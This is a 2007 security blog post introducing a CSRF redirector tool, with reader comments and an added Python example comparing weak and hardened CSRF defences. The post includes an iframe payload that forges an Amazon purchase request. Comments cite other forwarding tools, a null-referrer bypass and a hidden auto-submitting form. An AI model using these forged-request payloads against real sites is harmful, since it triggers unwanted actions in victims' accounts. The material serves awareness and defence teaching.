About the Author

Chris Shiflett

Hi, I’m Chris: entrepreneur, community leader, husband, and father. I live and work in Boulder, CO.


CSRF Redirector

Inspired by the XSS POST Forwarder, I just created the CSRF Redirector. It's a simple tool that makes it easy to test CSRF using POST, hopefully demonstrating how prevalent CSRF vulnerabilities are as well as reducing the misconception that forging a POST request is complicated.

To use it, construct a URL of the form http://shiflett.org/csrf.php?csrf=URL&NAME=VALUE, where URL is the (URL-encoded) target site, and NAME and VALUE represent a name-value pair, of which there can be zero or more.

For example, the following IFrame exploits the Amazon vulnerability:

<iframe src="http://shiflett.org/csrf.php?csrf=http%3A%2F%2Famazon.com%2Fgp%2Fproduct%2Fhandle-buy-box&ASIN=059600656X&offerListingID=XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf" />

I may add more features at some point. Until then, enjoy!
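The redirector works because a browser attaches the target site's cookies to a cross-site form submission just as it does to the site's own forms. The following framework-free Python is an added example (not the redirector's code and not code from this post) that models the target side: a handler that accepts a forged POST because it only checks the method and the session cookie, a Referer-only check that lets a request with no Referer through (the "null referrer" gap raised in the comments), and a hardened handler that requires a per-session synchronizer token and fails closed when Origin/Referer are absent. The `Request` class, `SESSIONS`, the hypothetical `https://shop.example` origin, the `handle_buy_*` functions and the cookie and header values are all constructed for the demonstration.

```python
"""Why 'use POST' alone is not a CSRF defence, and what is.

Added example: a framework-free model of a site's form handler and of the
requests a CSRF redirector makes the victim's browser send. SESSIONS,
SITE_ORIGIN, the handle_buy_* functions and all header/cookie values are
constructed for the demonstration, not taken from any real site.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed session store: session id (from the cookie) -> session data.
SESSIONS = {
    "sess-victim": {"user": "victim", "csrf_token": secrets.token_hex(16)},
}
SITE_ORIGIN = "https://shop.example"  # hypothetical target site


@dataclass
class Request:
    """Minimal stand-in for the request object a web framework would hand over."""
    method: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def _authenticated(req):
    """Return (session, None) for a POST carrying a valid session cookie, or
    (None, (status, message)). The browser attaches the cookie to cross-site
    form submissions too, so passing this proves nothing about where the
    form came from."""
    if req.method != "POST":
        return None, (405, "method not allowed")
    sess = SESSIONS.get(req.cookies.get("sid"))
    if sess is None:
        return None, (401, "login required")
    return sess, None


def handle_buy_weak(req):
    """Vulnerable: 'it is a POST and the user is logged in' is the whole check."""
    sess, err = _authenticated(req)
    if err:
        return err
    return 200, f"bought {req.form.get('ASIN')} for {sess['user']}"


def handle_buy_referer_only(req):
    """Incomplete: rejects a foreign Referer but waves through a missing one,
    which is exactly the gap a null-referrer submission slips through."""
    sess, err = _authenticated(req)
    if err:
        return err
    ref = req.headers.get("Referer")
    if ref and not ref.startswith(SITE_ORIGIN + "/"):
        return 403, "foreign referrer"
    return 200, f"bought {req.form.get('ASIN')} for {sess['user']}"


def _same_origin(req):
    """Fail closed: Origin (or, failing that, Referer) must name this site;
    an absent header is treated as cross-site rather than trusted."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False
    p = urlparse(src)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def handle_buy_hardened(req):
    """Synchronizer token (stored in the session, echoed in the site's own
    form, unreadable from another origin) plus the fail-closed origin check."""
    sess, err = _authenticated(req)
    if err:
        return err
    if not _same_origin(req):
        return 403, "cross-site request rejected"
    if not hmac.compare_digest(req.form.get("csrf_token", ""), sess["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    return 200, f"bought {req.form.get('ASIN')} for {sess['user']}"


def forged_request(attacker_origin=None):
    """Constructed: what the victim's browser sends when a page on another
    origin auto-submits a hidden POST form. The session cookie rides along,
    the token does not, and Origin/Referer are either the other origin's or,
    when that page suppresses the referrer, absent."""
    headers = {}
    if attacker_origin:
        headers = {"Origin": attacker_origin, "Referer": attacker_origin + "/page.html"}
    return Request("POST", headers, {"sid": "sess-victim"}, {"ASIN": "059600656X"})


def legitimate_request(include_token=True):
    """Constructed: the site's own form submitted by the logged-in user."""
    form = {"ASIN": "059600656X"}
    if include_token:
        form["csrf_token"] = SESSIONS["sess-victim"]["csrf_token"]
    return Request("POST", {"Origin": SITE_ORIGIN, "Referer": SITE_ORIGIN + "/item"},
                   {"sid": "sess-victim"}, form)


if __name__ == "__main__":
    cases = [("forged, attacker referrer", forged_request("https://evil.example")),
             ("forged, null referrer", forged_request()),
             ("legitimate", legitimate_request())]
    for label, req in cases:
        print(f"{label:26} weak={handle_buy_weak(req)[0]} "
              f"referer_only={handle_buy_referer_only(req)[0]} "
              f"hardened={handle_buy_hardened(req)[0]}")
```

Running the module prints one line per scenario: the weak handler accepts both forged requests, the Referer-only handler blocks the one that announces a foreign referrer but accepts the null-referrer one, and only the hardened handler rejects both while still accepting the user's own submission. Rejecting GET with a 405 is what "just use POST" amounts to, and it changes nothing for a tool that submits a POST.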

About this post

CSRF Redirector was posted on Tue, 17 Jul 2007.

17 comments

1. Drew Hintz said:

CSRF redirectors are useful. I have one that I've been using internally that strips out the HTTP referrer header using the javascript: null referrer technique. I've run into a handful of sites that check the referrer but are still vulnerable to CSRF using a null referrer.

Eventually I'll post a link to it on my blog... http://int2e.com/blog/

Wed, 18 Jul 2007 at 05:41:57 GMT


2. Sid said:

Nice idea but I've already seen people using tinyurl for this purpose. Of course the only difference is that people can tell tinyurl to always preview links in which case that won't work.

Wed, 18 Jul 2007 at 07:37:44 GMT


3. Sid said:

Sorry, it seems I can't read (just woke up). Of course tinyurl isn't being used for those POST CSRFs, just the GET ones. I have to say though, I fail to see how your script differs from my XSS POST forwarder script except that submission is automated in this one.

Mine could be used for CSRF (if it was automated) and yours can be used for XSS, so we made the same thing didn't we?

Oh btw ;p

Wed, 18 Jul 2007 at 07:46:22 GMT


4. Chris Shiflett said:

I fail to see how your script differs from my XSS POST forwarder script except that submission is automated in this one.

The automation is important for CSRF. In addition, it hides the response to the POST request, making the attack easier to conceal in various contexts.

And thanks for the bug report. :-)

Wed, 18 Jul 2007 at 13:59:27 GMT


5. Drew Hintz said:

Neat, looks like the CSRF redirector works. ;)

However, I can't think of a way to make the link indefinitely replicate itself.

Wed, 18 Jul 2007 at 17:20:24 GMT


6. Chris Shiflett said:

Yes, it works. :-)

I first disclosed the fact that my comments form is vulnerable to CSRF about a year and a half ago:

http://shiflett.org/blog/2006/mar/p...ch-2006-edition

Surprisingly, no one has exploited the vulnerability, despite the fact that there have been a countless number of XSS attempts.

Now that people can log in, I should address the vulnerability, but it's interesting to note that it hasn't been exploited until now. By contrast, the XSS vulnerability in the redirector was discovered (and fixed) within a few hours.

Wed, 18 Jul 2007 at 17:48:09 GMT


7. Chris Shiflett said:

Actually, to be clear, the CSRF vulnerability was exploited in the post where I mentioned it, but it hasn't been exploited since.

You might be wondering why I find this interesting or why I have honeypots on my site. The reason is that I want to be able to get a feel for the popularity (or lack thereof) of CSRF. I suspect the number of people actively trying to discover CSRF vulnerabilities is much smaller than the number of people actively trying to discover XSS vulnerabilities, and as soon as this is no longer true, CSRF is going to be a much bigger problem.

Wed, 18 Jul 2007 at 18:10:07 GMT


8. pdp said:

Hi Chris,

We have a CSRF forwarder script as well, located at: http://www.gnucitizen.org/util/csrf

It is quite tiny and flexible... there are plans to add features to hide the Referer as well.

This is how I use it for GET:

http://www.gnucitizen.org/util/csrf?_method=GET&_url=http%3A//www.google.com/search&q=test

And this is for POST:

http://www.gnucitizen.org/util/csrf?_url=http%3A//www.google.com/search&q=test

http://www.gnucitizen.org/util/csrf?_method=POST&_url=http%3A//www.google.com/search&q=test

Quite simple.

Fri, 20 Jul 2007 at 14:28:59 GMT


9. killerguppy said:

Great little tool. I'm testing it on several vuln scripts I wrote a while ago for a demo.

Is there any way you could post the source code? I hate using tools if I have no idea how they work. Also, I'm interested to see if/how you got around cookie/session authentication. Every time I tried to make a tool like this, linking the vulnerable form to the victim user was always a huge problem that I couldn't get past without some XSS or a session ID in the URL....

Sun, 22 Jul 2007 at 17:14:14 GMT


10. q said:

Nice tool.

PS, I was the young college student at OSCON asking you a lot of questions after you got done with "Security 2.0".

Fri, 10 Aug 2007 at 00:04:32 GMT


11. q said:

Oh, by the way, the guy that was in the room before you at OSCON said some stuff in his session that was wrong. He said that if you make a form use POST it will be protected from CSRF. I didn't want to say anything because like 2 seconds before he said this he asked how many people had heard of CSRF and like 2 people raised their hands, including me. I don't think anyone would've taken me seriously, being a 17-year-old and looking like one. Besides, I don't like being at the center of attention. I also hate arguing. Maybe I should've said something.

Fri, 10 Aug 2007 at 07:33:57 GMT


12. Replyer said:

q said: Maybe I should've said something.

Sometimes you're better off saying nothing.

Sat, 11 Aug 2007 at 03:16:19 GMT


13. q said:

I posted about this on my new blog:

http://qqq3468349856.blogspot.com/

Mon, 13 Aug 2007 at 04:35:01 GMT


14. Steve said:

There's a useful online tool for converting GET requests to POST requests at:

http://www.gettopost.com.

Just enter a URL and it will convert any GET parameters into a POST request and then submit the POST. It also accepts URLs tagged onto the base name, e.g.:

www.gettopost.com/gettopost.html?http://www.url.com?postparam1=value1

Also on the site is a useful bookmarklet for extracting the form parameter values that are filled in on all forms in any webpage. HTH, Steve

Sat, 16 Feb 2008 at 13:42:42 GMT


15. Alexander Gre said:

> I've run in to a handful of sites check the referrer but are still vulnerable CSRF using a null referrer.

How does it work? Can I see the HTML/JavaScript code?

Thu, 24 Apr 2008 at 21:14:35 GMT


16. MustLive said:

Chris,

As I wrote you by email, I recently found a bug in your CSRF redirector.

When using the char "[" (in ASCII or URL-encoded), it is removed along with the following symbols from the query parameters (in the body of your redirector).

http://shiflett.org/csrf.php?csrf=h...amp;name[i]=val

So I wish you would fix this bug (add proper support for the "[" char) in your web application.

Tue, 09 Dec 2008 at 22:54:07 GMT


17. MustN'tLive said:

<html>
<head>
<title>Chris Shiflett: CSRF Redirector</title>
</head>
<body>
<iframe style="width: 0px; height: 0px; visibility: hidden" name="hidden"></iframe>
<form name="csrf" action="http://site" method="post" target="hidden">
<input type="hidden" name="name" value="<br />
<b>Warning</b>: htmlentities() expects parameter 1 to be string, array given in <b>/www/webroots/shiflett.org/www/csrf.php</b> on line <b>18</b><br />
" />
</form>
<script>document.csrf.submit();</script>
</body>
</html>

Sun, 30 Jan 2011 at 17:24:38 GMT

